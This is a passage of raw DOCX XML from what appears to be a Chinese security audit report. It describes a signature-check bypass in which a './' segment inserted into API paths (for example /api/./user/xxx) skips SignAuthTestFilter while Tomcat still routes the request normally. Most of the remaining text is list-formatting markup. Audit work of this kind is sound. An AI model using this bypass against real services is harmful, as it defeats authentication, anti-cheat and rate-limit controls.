        <w:t>（普通用户账号即可）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1417"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">确认 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>properties.isEnabled()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（即签名校验已启用）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1418"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">向任意 SIGN_TEST_PATTERNS 覆盖的端点发送请求，将路径中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 后、子路径前插入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/user/xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/./user/xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1419"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>无需携带任何签名相关参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>appKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>timestamp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>sign</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），仅携带 Bearer Token；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1420"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">服务端 Tomcat 将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/./user/xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 路由到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/user/xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的真实控制器，请求正常响应；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1421"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>签名校验层被完全绕过，可向所有受保护 API 发起未授权客户端请求（规避反作弊、APP 认证、基于 appKey 的频率限制等控制）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1422"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">是否需要登录：是（需要有效 Bearer Token 通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的用户鉴权）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1423"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1424"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击前提：目标系统 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>enabled=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（生产环境通常启用）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>🔗 受影响调用链（1 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1425"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>自身</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📄 审计文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m271_1183_normalizePath_ctrl-self.md</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1050">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21051">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21052">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21053">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21054">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21055">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21056">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21057">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21058">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21059">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21060">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21061">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21062">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21063">
    <w:lvl>
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21064">
    <w:lvl>
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21065">
    <w:lvl>
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21066">
    <w:lvl>
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21067">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21068">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21069">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21070">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21071">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21072">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21073">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21074">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21075">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21076">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21077">
    <w:lvl>
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21078">
    <w:lvl>
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21079">
    <w:lvl>
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21080">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21081">
    <w:lvl>
      <w:start w:val="8"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21082">
    <w:lvl>
      <w:start w:val="9"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21083">
    <w:lvl>
      <w:start w:val="10"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21084">
    <w:lvl>
      <w:start w:val="11"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21085">
    <w:lvl>
      <w:start w:val="12"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21086">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21087">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21088">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21089">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21090">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21091">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21092">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21093">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21094">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21095">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21096">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21097">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21098">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21099">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
